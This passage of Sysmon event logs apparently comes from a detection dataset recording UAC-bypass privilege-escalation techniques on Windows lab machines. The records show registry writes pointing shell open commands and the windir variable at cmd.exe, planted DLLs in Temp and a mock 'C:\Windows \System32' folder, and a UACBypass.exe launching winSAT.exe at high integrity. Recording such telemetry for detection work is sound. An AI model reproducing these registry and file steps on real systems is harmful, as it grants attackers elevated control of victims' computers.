"2019-08-14T11:53:30.022856Z" - Version: 5 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - CreationUtcTime: "2019-08-03 11:23:15.519" - Image: "C:\\Windows\\explorer.exe" - ProcessGuid: 747F3D96-6EA3-5D45-0000-0010204DE100 - ProcessId: 7984 - RuleName: PrivEsc - UAC Bypass UACME 30 - TargetFilename: "C:\\Users\\IEUser\\AppData\\Local\\Temp\\wow64log.dll" - UtcTime: "2019-08-03 
11:23:15.519" - System: - Channel: Microsoft-Windows-Sysmon/Operational - Computer: MSEDGEWIN10 - Correlation: ~ - EventID: 11 - EventRecordID: 5401 - Execution_attributes: - ProcessID: 2780 - ThreadID: 3676 - Keywords: "0x8000000000000000" - Level: 4 - Opcode: 0 - Provider_attributes: - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security_attributes: - UserID: S-1-5-18 - Task: 11 - TimeCreated_attributes: - SystemTime: "2019-08-03T11:23:15.560614Z" - Version: 2 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - Company: Yokai Ltd. - Description: Yamabiko Proxy - FileVersion: 2.5.1.0 - Hashes: "SHA1=4DA0DCAD144039F6DD7739E37AB3A7B78FB86B4D,MD5=2BA4BC4753A29D56AA185C972CA1023E,SHA256=A6BE522A1FC48B391EFCB3A3CFE49560A455F1BB853505F7E9ACCA8EDF116B4C,IMPHASH=380A21A3D5988707B0CFE7CA5B1C7E0B" - Image: "C:\\Windows\\System32\\sysprep\\sysprep.exe" - ImageLoaded: "C:\\Windows\\System32\\sysprep\\cryptbase.dll" - ProcessGuid: 365ABB72-28D3-5CDA-0000-00106DC31300 - ProcessId: 3068 - Product: Yamabiko - RuleName: Possible UAC Bypass - mcx2prov DLL - Signature: "" - SignatureStatus: Unavailable - Signed: "false" - UtcTime: "2019-05-14 02:32:51.728" - System: - Channel: Microsoft-Windows-Sysmon/Operational - Computer: IEWIN7 - Correlation: ~ - EventID: 7 - EventRecordID: 17728 - Execution_attributes: - ProcessID: 2024 - ThreadID: 2004 - Keywords: "0x8000000000000000" - Level: 4 - Opcode: 0 - Provider_attributes: - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security_attributes: - UserID: S-1-5-18 - Task: 7 - TimeCreated_attributes: - SystemTime: "2019-05-14T02:32:51.831307Z" - Version: 3 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - Company: "?" - Description: "?" - FileVersion: "?" 
- Hashes: "SHA1=AA3BF7118AE8138859FC0EE9202684C6DA22C176,MD5=3F090AA1CAE8B179F93B2064B8609AE2,SHA256=AC1DD32C41F6002BDF2EB564653FF23E069594CE55F9E22093355084EE28A6FD,IMPHASH=10D8CBCC4D9E244D697F1C09224856DC" - Image: "C:\\Windows\\System32\\migwiz\\migwiz.exe" - ImageLoaded: "C:\\Windows\\System32\\migwiz\\CRYPTBASE.dll" - ProcessGuid: 365ABB72-FC61-5CD6-0000-0010141A1300 - ProcessId: 3240 - Product: "?" - RuleName: Possible UAC Bypass - mcx2prov DLL - Signature: "" - SignatureStatus: Unavailable - Signed: "false" - UtcTime: "2019-05-11 16:46:26.000" - System: - Channel: Microsoft-Windows-Sysmon/Operational - Computer: IEWIN7 - Correlation: ~ - EventID: 7 - EventRecordID: 15975 - Execution_attributes: - ProcessID: 2008 - ThreadID: 1992 - Keywords: "0x8000000000000000" - Level: 4 - Opcode: 0 - Provider_attributes: - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security_attributes: - UserID: S-1-5-18 - Task: 7 - TimeCreated_attributes: - SystemTime: "2019-05-11T16:46:26.203657Z" - Version: 3 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - Details: (Empty) - EventType: SetValue - Image: "C:\\Windows\\system32\\reg.exe" - ProcessGuid: 747F3D96-B07F-5D46-0000-001031A90F04 - ProcessId: 1768 - RuleName: PrivEsc - UAC bypass UACME-56 - TargetObject: "HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command\\DelegateExecute" - UtcTime: "2019-08-04 10:16:31.415" - System: - Channel: Microsoft-Windows-Sysmon/Operational - Computer: MSEDGEWIN10 - Correlation: ~ - EventID: 13 - EventRecordID: 5944 - Execution_attributes: - ProcessID: 2780 - ThreadID: 3676 - Keywords: "0x8000000000000000" - Level: 4 - Opcode: 0 - Provider_attributes: - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security_attributes: - UserID: S-1-5-18 - Task: 13 - TimeCreated_attributes: - SystemTime: 
"2019-08-04T10:16:31.476803Z" - Version: 2 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - Details: "C:\\Windows\\system32\\cmd.exe /c start C:\\Windows\\system32\\cmd.exe" - EventType: SetValue - Image: "C:\\Windows\\system32\\reg.exe" - ProcessGuid: 747F3D96-B07F-5D46-0000-0010F1B20F04 - ProcessId: 2444 - RuleName: PrivEsc - UAC bypass UACME-56 - TargetObject: "HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command\\(Default)" - UtcTime: "2019-08-04 10:16:31.572" - System: - Channel: Microsoft-Windows-Sysmon/Operational - Computer: MSEDGEWIN10 - Correlation: ~ - EventID: 13 - EventRecordID: 5946 - Execution_attributes: - ProcessID: 2780 - ThreadID: 3676 - Keywords: "0x8000000000000000" - Level: 4 - Opcode: 0 - Provider_attributes: - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security_attributes: - UserID: S-1-5-18 - Task: 13 - TimeCreated_attributes: - SystemTime: "2019-08-04T10:16:31.609571Z" - Version: 2 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - Details: "C:\\Windows\\system32\\cmd.exe /c start C:\\Windows\\system32\\cmd.exe" - EventType: SetValue - Image: "C:\\Windows\\system32\\reg.exe" - ProcessGuid: 747F3D96-B097-5D46-0000-0010E1321204 - ProcessId: 1960 - RuleName: PrivEsc - UAC bypass UACME-56 - TargetObject: "HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command\\(Default)" - UtcTime: "2019-08-04 10:16:55.415" - System: - Channel: Microsoft-Windows-Sysmon/Operational - Computer: MSEDGEWIN10 - Correlation: ~ - EventID: 13 - EventRecordID: 5953 - Execution_attributes: - ProcessID: 2780 - ThreadID: 3676 - Keywords: "0x8000000000000000" - Level: 4 - Opcode: 0 - Provider_attributes: - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - 
Security_attributes: - UserID: S-1-5-18 - Task: 13 - TimeCreated_attributes: - SystemTime: "2019-08-04T10:16:55.441262Z" - Version: 2 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - Details: "{4ED3A719-CEA8-4BD9-910D-E252F997AFC2}" - EventType: SetValue - Image: "C:\\Windows\\system32\\reg.exe" - ProcessGuid: 747F3D96-B097-5D46-0000-0010E7381204 - ProcessId: 3444 - RuleName: PrivEsc - UAC bypass UACME-56 - TargetObject: "HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command\\DelegateExecute" - UtcTime: "2019-08-04 10:16:55.619" - System: - Channel: Microsoft-Windows-Sysmon/Operational - Computer: MSEDGEWIN10 - Correlation: ~ - EventID: 13 - EventRecordID: 5955 - Execution_attributes: - ProcessID: 2780 - ThreadID: 3676 - Keywords: "0x8000000000000000" - Level: 4 - Opcode: 0 - Provider_attributes: - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security_attributes: - UserID: S-1-5-18 - Task: 13 - TimeCreated_attributes: - SystemTime: "2019-08-04T10:16:55.643799Z" - Version: 2 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - CommandLine: "\"C:\\Users\\IEUser\\Downloads\\UACBypass.exe\" " - Company: "?" - CurrentDirectory: "C:\\Users\\IEUser\\Downloads\\" - Description: "?" - FileVersion: "?" 
- Hashes: "SHA1=23434874C017F3987BA5FD7B9ABB5FCCF1D62231,MD5=4C2E8A86ADAF45774C0A0CB52F25C04B,SHA256=81C898300A19FD8F92297E4BE8BEC8C43E9420B42E93167D375FA1512654EA23,IMPHASH=1A0963EBB2F7EC4A6BDCCD537C92C853" - Image: "C:\\Users\\IEUser\\Downloads\\UACBypass.exe" - IntegrityLevel: Medium - LogonGuid: 747F3D96-D21D-5D3C-0000-0020DD5C2300 - LogonId: "0x235cdd" - ParentCommandLine: "C:\\Windows\\Explorer.EXE" - ParentImage: "C:\\Windows\\explorer.exe" - ParentProcessGuid: 747F3D96-D21F-5D3C-0000-0010531C2400 - ParentProcessId: 4536 - ProcessGuid: 747F3D96-D39D-5D3C-0000-001026F55500 - ProcessId: 6632 - Product: "?" - RuleName: "" - TerminalSessionId: 1 - User: "MSEDGEWIN10\\IEUser" - UtcTime: "2019-07-27 22:43:41.388" - System: - Channel: Microsoft-Windows-Sysmon/Operational - Computer: MSEDGEWIN10 - Correlation: ~ - EventID: 1 - EventRecordID: 4723 - Execution_attributes: - ProcessID: 2748 - ThreadID: 3376 - Keywords: "0x8000000000000000" - Level: 4 - Opcode: 0 - Provider_attributes: - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security_attributes: - UserID: S-1-5-18 - Task: 1 - TimeCreated_attributes: - SystemTime: "2019-07-27T22:43:41.424255Z" - Version: 5 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - CreationUtcTime: "2019-07-27 22:43:41.627" - Image: "C:\\Users\\IEUser\\Downloads\\UACBypass.exe" - ProcessGuid: 747F3D96-D39D-5D3C-0000-001026F55500 - ProcessId: 6632 - RuleName: ProvEsc - UAC Bypass Mocking Trusted WinFolders - TargetFilename: "C:\\Windows \\System32" - UtcTime: "2019-07-27 22:43:41.627" - System: - Channel: Microsoft-Windows-Sysmon/Operational - Computer: MSEDGEWIN10 - Correlation: ~ - EventID: 11 - EventRecordID: 4724 - Execution_attributes: - ProcessID: 2748 - ThreadID: 3376 - Keywords: "0x8000000000000000" - Level: 4 - Opcode: 0 - Provider_attributes: - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - 
Security_attributes: - UserID: S-1-5-18 - Task: 11 - TimeCreated_attributes: - SystemTime: "2019-07-27T22:43:41.755254Z" - Version: 2 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - CreationUtcTime: "2019-07-27 22:43:41.627" - Image: "C:\\Users\\IEUser\\Downloads\\UACBypass.exe" - ProcessGuid: 747F3D96-D39D-5D3C-0000-001026F55500 - ProcessId: 6632 - RuleName: ProvEsc - UAC Bypass Mocking Trusted WinFolders - TargetFilename: "C:\\Windows \\System32\\winSAT.exe" - UtcTime: "2019-07-27 22:43:41.627" - System: - Channel: Microsoft-Windows-Sysmon/Operational - Computer: MSEDGEWIN10 - Correlation: ~ - EventID: 11 - EventRecordID: 4725 - Execution_attributes: - ProcessID: 2748 - ThreadID: 3376 - Keywords: "0x8000000000000000" - Level: 4 - Opcode: 0 - Provider_attributes: - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security_attributes: - UserID: S-1-5-18 - Task: 11 - TimeCreated_attributes: - SystemTime: "2019-07-27T22:43:41.755406Z" - Version: 2 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - CreationUtcTime: "2019-07-27 22:43:41.641" - Image: "C:\\Users\\IEUser\\Downloads\\UACBypass.exe" - ProcessGuid: 747F3D96-D39D-5D3C-0000-001026F55500 - ProcessId: 6632 - RuleName: ProvEsc - UAC Bypass Mocking Trusted WinFolders - TargetFilename: "C:\\Windows \\System32\\WINMM.dll" - UtcTime: "2019-07-27 22:43:41.641" - System: - Channel: Microsoft-Windows-Sysmon/Operational - Computer: MSEDGEWIN10 - Correlation: ~ - EventID: 11 - EventRecordID: 4726 - Execution_attributes: - ProcessID: 2748 - ThreadID: 3376 - Keywords: "0x8000000000000000" - Level: 4 - Opcode: 0 - Provider_attributes: - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security_attributes: - UserID: S-1-5-18 - Task: 11 - TimeCreated_attributes: - SystemTime: "2019-07-27T22:43:41.757216Z" - Version: 2 -Event_attributes: - 
xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - CommandLine: "\"C:\\Windows \\System32\\winSAT.exe\" formal" - Company: Microsoft Corporation - CurrentDirectory: "C:\\Users\\IEUser\\Downloads\\" - Description: Windows System Assessment Tool - FileVersion: 10.0.17763.1 (WinBuild.160101.0800) - Hashes: "SHA1=C6B8FDB2ED8FA8A20CD7348E221A18443EF8510B,MD5=BA2ED9D3420FC7F43CB0E535AE8A042C,SHA256=5BD1CD3B86A26DE22ED2C6CDD552C0DAD499B2F1BA1E5A85AF2FB78CFF5D502A,IMPHASH=6F82B876C4C1039B7980A9F0C8B57991" - Image: "C:\\Windows \\System32\\winSAT.exe" - IntegrityLevel: Medium - LogonGuid: 747F3D96-D21D-5D3C-0000-0020DD5C2300 - LogonId: "0x235cdd" - ParentCommandLine: "\"C:\\Users\\IEUser\\Downloads\\UACBypass.exe\" " - ParentImage: "C:\\Users\\IEUser\\Downloads\\UACBypass.exe" - ParentProcessGuid: 747F3D96-D39D-5D3C-0000-001026F55500 - ParentProcessId: 6632 - ProcessGuid: 747F3D96-D39D-5D3C-0000-0010131E5600 - ProcessId: 7128 - Product: Microsoft® Windows® Operating System - RuleName: PrivEsc - UACBypass Mocking Trusted WinFolders - TerminalSessionId: 1 - User: "MSEDGEWIN10\\IEUser" - UtcTime: "2019-07-27 22:43:41.972" - System: - Channel: Microsoft-Windows-Sysmon/Operational - Computer: MSEDGEWIN10 - Correlation: ~ - EventID: 1 - EventRecordID: 4727 - Execution_attributes: - ProcessID: 2748 - ThreadID: 3376 - Keywords: "0x8000000000000000" - Level: 4 - Opcode: 0 - Provider_attributes: - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security_attributes: - UserID: S-1-5-18 - Task: 1 - TimeCreated_attributes: - SystemTime: "2019-07-27T22:43:42.033042Z" - Version: 5 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - CallTrace: 
"C:\\Windows\\SYSTEM32\\ntdll.dll+a0fb4|C:\\Windows\\System32\\KERNELBASE.dll+47241|C:\\Windows\\System32\\KERNELBASE.dll+46196|C:\\Windows\\System32\\KERNEL32.DLL+1c2e3|C:\\Windows\\System32\\windows.storage.dll+19f330|C:\\Windows\\System32\\windows.storage.dll+14ce7e|C:\\Windows\\System32\\windows.storage.dll+efad8|C:\\Windows\\System32\\windows.storage.dll+ef8b7|C:\\Windows\\System32\\windows.storage.dll+ef51d|C:\\Windows\\System32\\windows.storage.dll+14b0ad|C:\\Windows\\System32\\windows.storage.dll+145da4|C:\\Windows\\System32\\windows.storage.dll+147c7a|C:\\Windows\\System32\\windows.storage.dll+14432d|C:\\Windows\\System32\\windows.storage.dll+144225|C:\\Windows\\System32\\SHELL32.dll+a880f|C:\\Windows\\System32\\SHELL32.dll+a86ca|C:\\Windows\\System32\\SHELL32.dll+484e7|C:\\Windows\\System32\\SHELL32.dll+52549|C:\\Windows\\System32\\SHELL32.dll+a8393|C:\\Windows\\System32\\SHELL32.dll+a826b|C:\\Windows\\System32\\SHELL32.dll+50666|C:\\Windows\\System32\\SHELL32.dll+c2e1e|C:\\Windows\\System32\\shcore.dll+2c315|C:\\Windows\\System32\\KERNEL32.DLL+17974" - GrantedAccess: "0x1fffff" - RuleName: "" - SourceImage: "C:\\Users\\IEUser\\Downloads\\UACBypass.exe" - SourceProcessGUID: 747F3D96-D39D-5D3C-0000-001026F55500 - SourceProcessId: 6632 - SourceThreadId: 4364 - TargetImage: "C:\\Windows \\System32\\winSAT.exe" - TargetProcessGUID: 747F3D96-D39D-5D3C-0000-0010131E5600 - TargetProcessId: 7128 - UtcTime: "2019-07-27 22:43:42.018" - System: - Channel: Microsoft-Windows-Sysmon/Operational - Computer: MSEDGEWIN10 - Correlation: ~ - EventID: 10 - EventRecordID: 4728 - Execution_attributes: - ProcessID: 2748 - ThreadID: 3376 - Keywords: "0x8000000000000000" - Level: 4 - Opcode: 0 - Provider_attributes: - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security_attributes: - UserID: S-1-5-18 - Task: 10 - TimeCreated_attributes: - SystemTime: "2019-07-27T22:43:42.033420Z" - Version: 3 -Event_attributes: - xmlns: 
"http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - CommandLine: "\"C:\\Windows \\System32\\winSAT.exe\" formal" - Company: Microsoft Corporation - CurrentDirectory: "C:\\Windows\\system32\\" - Description: Windows System Assessment Tool - FileVersion: 10.0.17763.1 (WinBuild.160101.0800) - Hashes: "SHA1=C6B8FDB2ED8FA8A20CD7348E221A18443EF8510B,MD5=BA2ED9D3420FC7F43CB0E535AE8A042C,SHA256=5BD1CD3B86A26DE22ED2C6CDD552C0DAD499B2F1BA1E5A85AF2FB78CFF5D502A,IMPHASH=6F82B876C4C1039B7980A9F0C8B57991" - Image: "C:\\Windows \\System32\\winSAT.exe" - IntegrityLevel: High - LogonGuid: 747F3D96-D21D-5D3C-0000-0020EE5B2300 - LogonId: "0x235bee" - ParentCommandLine: "\"C:\\Users\\IEUser\\Downloads\\UACBypass.exe\" " - ParentImage: "C:\\Users\\IEUser\\Downloads\\UACBypass.exe" - ParentProcessGuid: 747F3D96-D39D-5D3C-0000-001026F55500 - ParentProcessId: 6632 - ProcessGuid: 747F3D96-D39E-5D3C-0000-0010805A5600 - ProcessId: 3904 - Product: Microsoft® Windows® Operating System - RuleName: PrivEsc - UACBypass Mocking Trusted WinFolders - TerminalSessionId: 1 - User: "MSEDGEWIN10\\IEUser" - UtcTime: "2019-07-27 22:43:42.354" - System: - Channel: Microsoft-Windows-Sysmon/Operational - Computer: MSEDGEWIN10 - Correlation: ~ - EventID: 1 - EventRecordID: 4730 - Execution_attributes: - ProcessID: 2748 - ThreadID: 3376 - Keywords: "0x8000000000000000" - Level: 4 - Opcode: 0 - Provider_attributes: - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security_attributes: - UserID: S-1-5-18 - Task: 1 - TimeCreated_attributes: - SystemTime: "2019-07-27T22:43:42.392880Z" - Version: 5 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - Image: "C:\\Users\\IEUser\\Downloads\\UACBypass.exe" - ProcessGuid: 747F3D96-D39D-5D3C-0000-001026F55500 - ProcessId: 6632 - RuleName: "" - UtcTime: "2019-07-27 22:43:42.394" - System: - Channel: Microsoft-Windows-Sysmon/Operational - Computer: 
MSEDGEWIN10 - Correlation: ~ - EventID: 5 - EventRecordID: 4731 - Execution_attributes: - ProcessID: 2748 - ThreadID: 3376 - Keywords: "0x8000000000000000" - Level: 4 - Opcode: 0 - Provider_attributes: - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security_attributes: - UserID: S-1-5-18 - Task: 5 - TimeCreated_attributes: - SystemTime: "2019-07-27T22:43:42.938088Z" - Version: 3 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - Company: "?" - Description: "?" - FileVersion: "?" - Hashes: "SHA1=7CE46211A5A8D7FE4A767E12BD80769673FDAEE5,MD5=7F8A2B842948EB70133FA34F0CFE772B,SHA256=078CA38607F24FD21A563FA5189843734677B98D5017D5EBB03B2960053B25B5,IMPHASH=14E2B78EE82AD03FAC47525FEDDCA7E6" - Image: "C:\\Windows \\System32\\winSAT.exe" - ImageLoaded: "C:\\Windows \\System32\\WINMM.dll" - ProcessGuid: 747F3D96-D39E-5D3C-0000-0010805A5600 - ProcessId: 3904 - Product: "?" - RuleName: PrivEsc - UACBypass Mocking Trusted WinFolders - Signature: "" - SignatureStatus: Unavailable - Signed: "false" - UtcTime: "2019-07-27 22:43:42.661" - System: - Channel: Microsoft-Windows-Sysmon/Operational - Computer: MSEDGEWIN10 - Correlation: ~ - EventID: 7 - EventRecordID: 4732 - Execution_attributes: - ProcessID: 2748 - ThreadID: 3384 - Keywords: "0x8000000000000000" - Level: 4 - Opcode: 0 - Provider_attributes: - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security_attributes: - UserID: S-1-5-18 - Task: 7 - TimeCreated_attributes: - SystemTime: "2019-07-27T22:43:43.016956Z" - Version: 3 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - Details: "c:\\Windows\\System32\\cmd.exe" - EventType: SetValue - Image: "C:\\Windows\\system32\\reg.exe" - ProcessGuid: 747F3D96-095D-5EB4-0000-001082FF1700 - ProcessId: 7084 - RuleName: PrivEsc - T1088 - UACBypass - changepk UACME61 - TargetObject: 
"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\\Launcher.SystemSettings\\shell\\open\\command\\(Default)" - UtcTime: "2020-05-07 13:13:01.680" - System: - Channel: Microsoft-Windows-Sysmon/Operational - Computer: MSEDGEWIN10 - Correlation: ~ - EventID: 13 - EventRecordID: 112814 - Execution_attributes: - ProcessID: 2888 - ThreadID: 3384 - Keywords: "0x8000000000000000" - Level: 4 - Opcode: 0 - Provider_attributes: - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security_attributes: - UserID: S-1-5-18 - Task: 13 - TimeCreated_attributes: - SystemTime: "2020-05-07T13:13:01.683498Z" - Version: 2 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - Company: "?" - Description: "?" - FileVersion: "?" - Hashes: "SHA1=AA3BF7118AE8138859FC0EE9202684C6DA22C176,MD5=3F090AA1CAE8B179F93B2064B8609AE2,SHA256=AC1DD32C41F6002BDF2EB564653FF23E069594CE55F9E22093355084EE28A6FD,IMPHASH=10D8CBCC4D9E244D697F1C09224856DC" - Image: "C:\\Windows\\ehome\\Mcx2Prov.exe" - ImageLoaded: "C:\\Windows\\ehome\\CRYPTBASE.dll" - ProcessGuid: 365ABB72-9AE2-5CD6-0000-0010337C1700 - ProcessId: 2688 - Product: "?" 
- RuleName: Possible UAC Bypass - mcx2prov DLL - Signature: "" - SignatureStatus: Unavailable - Signed: "false" - UtcTime: "2019-05-11 09:50:26.873" - System: - Channel: Microsoft-Windows-Sysmon/Operational - Computer: IEWIN7 - Correlation: ~ - EventID: 7 - EventRecordID: 15882 - Execution_attributes: - ProcessID: 2000 - ThreadID: 1748 - Keywords: "0x8000000000000000" - Level: 4 - Opcode: 0 - Provider_attributes: - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security_attributes: - UserID: S-1-5-18 - Task: 7 - TimeCreated_attributes: - SystemTime: "2019-05-11T09:50:27.030880Z" - Version: 3 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - Details: "C:\\Users\\IEUser\\AppData\\Local\\Temp\\DNeruK" - EventType: SetValue - Image: "C:\\Windows\\explorer.exe" - ProcessGuid: 747F3D96-BB89-5EBA-0000-001057413600 - ProcessId: 1036 - RuleName: PrivEsc - Rogue Windir - UAC bypass prep - TargetObject: "HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Environment\\windir" - UtcTime: "2020-05-12 15:06:49.118" - System: - Channel: Microsoft-Windows-Sysmon/Operational - Computer: MSEDGEWIN10 - Correlation: ~ - EventID: 13 - EventRecordID: 143174 - Execution_attributes: - ProcessID: 2856 - ThreadID: 3608 - Keywords: "0x8000000000000000" - Level: 4 - Opcode: 0 - Provider_attributes: - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security_attributes: - UserID: S-1-5-18 - Task: 13 - TimeCreated_attributes: - SystemTime: "2020-05-12T15:06:49.183867Z" - Version: 2 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - Company: "?" - Description: "?" - FileVersion: "?" 
- Hashes: "SHA1=AA3BF7118AE8138859FC0EE9202684C6DA22C176,MD5=3F090AA1CAE8B179F93B2064B8609AE2,SHA256=AC1DD32C41F6002BDF2EB564653FF23E069594CE55F9E22093355084EE28A6FD,IMPHASH=10D8CBCC4D9E244D697F1C09224856DC" - Image: "C:\\Windows\\System32\\sysprep\\sysprep.exe" - ImageLoaded: "C:\\Windows\\System32\\sysprep\\CRYPTBASE.dll" - ProcessGuid: 365ABB72-FE39-5CD6-0000-001012701700 - ProcessId: 2572 - Product: "?" - RuleName: Possible UAC Bypass - mcx2prov DLL - Signature: "" - SignatureStatus: Unavailable - Signed: "false" - UtcTime: "2019-05-11 16:54:17.821" - System: - Channel: Microsoft-Windows-Sysmon/Operational - Computer: IEWIN7 - Correlation: ~ - EventID: 7 - EventRecordID: 15992 - Execution_attributes: - ProcessID: 2008 - ThreadID: 1992 - Keywords: "0x8000000000000000" - Level: 4 - Opcode: 0 - Provider_attributes: - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security_attributes: - UserID: S-1-5-18 - Task: 7 - TimeCreated_attributes: - SystemTime: "2019-05-11T16:54:18.069438Z" - Version: 3 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - CreationUtcTime: "2019-08-03 12:06:53.846" - Image: "C:\\Windows\\explorer.exe" - ProcessGuid: 747F3D96-78DD-5D45-0000-0010B8A50301 - ProcessId: 5080 - RuleName: PrivEsc - UAC Bypass UACME 23 - TargetFilename: "C:\\Users\\IEUser\\AppData\\Local\\Temp\\dismcore.dll" - UtcTime: "2019-08-03 12:06:53.846" - System: - Channel: Microsoft-Windows-Sysmon/Operational - Computer: MSEDGEWIN10 - Correlation: ~ - EventID: 11 - EventRecordID: 5429 - Execution_attributes: - ProcessID: 2780 - ThreadID: 3676 - Keywords: "0x8000000000000000" - Level: 4 - Opcode: 0 - Provider_attributes: - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security_attributes: - UserID: S-1-5-18 - Task: 11 - TimeCreated_attributes: - SystemTime: "2019-08-03T12:06:53.933988Z" - Version: 2 -Event_attributes: - xmlns: 
"http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - CreationUtcTime: "2019-08-03 12:08:13.721" - Image: "C:\\Windows\\explorer.exe" - ProcessGuid: 747F3D96-792D-5D45-0000-00104F190601 - ProcessId: 5336 - RuleName: PrivEsc - UAC Bypass UACME 22 - TargetFilename: "C:\\Users\\IEUser\\AppData\\Local\\Temp\\comctl32.dll" - UtcTime: "2019-08-03 12:08:13.721" - System: - Channel: Microsoft-Windows-Sysmon/Operational - Computer: MSEDGEWIN10 - Correlation: ~ - EventID: 11 - EventRecordID: 5438 - Execution_attributes: - ProcessID: 2780 - ThreadID: 3676 - Keywords: "0x8000000000000000" - Level: 4 - Opcode: 0 - Provider_attributes: - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security_attributes: - UserID: S-1-5-18 - Task: 11 - TimeCreated_attributes: - SystemTime: "2019-08-03T12:08:13.818381Z" - Version: 2 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - Details: "\"C:\\Windows\\system32\\cmd.exe\"" - EventType: SetValue - Image: "C:\\Windows\\explorer.exe" - ProcessGuid: 747F3D96-5808-5D45-0000-00106CDC3E00 - ProcessId: 924 - RuleName: PrivEsc - UAC bypass UACME-34 - TargetObject: "HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Environment\\windir" - UtcTime: "2019-08-03 09:46:48.692" - System: - Channel: Microsoft-Windows-Sysmon/Operational - Computer: MSEDGEWIN10 - Correlation: ~ - EventID: 13 - EventRecordID: 5132 - Execution_attributes: - ProcessID: 2780 - ThreadID: 3676 - Keywords: "0x8000000000000000" - Level: 4 - Opcode: 0 - Provider_attributes: - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security_attributes: - UserID: S-1-5-18 - Task: 13 - TimeCreated_attributes: - SystemTime: "2019-08-03T09:46:48.726304Z" - Version: 2 -Event_attributes: - xmlns: 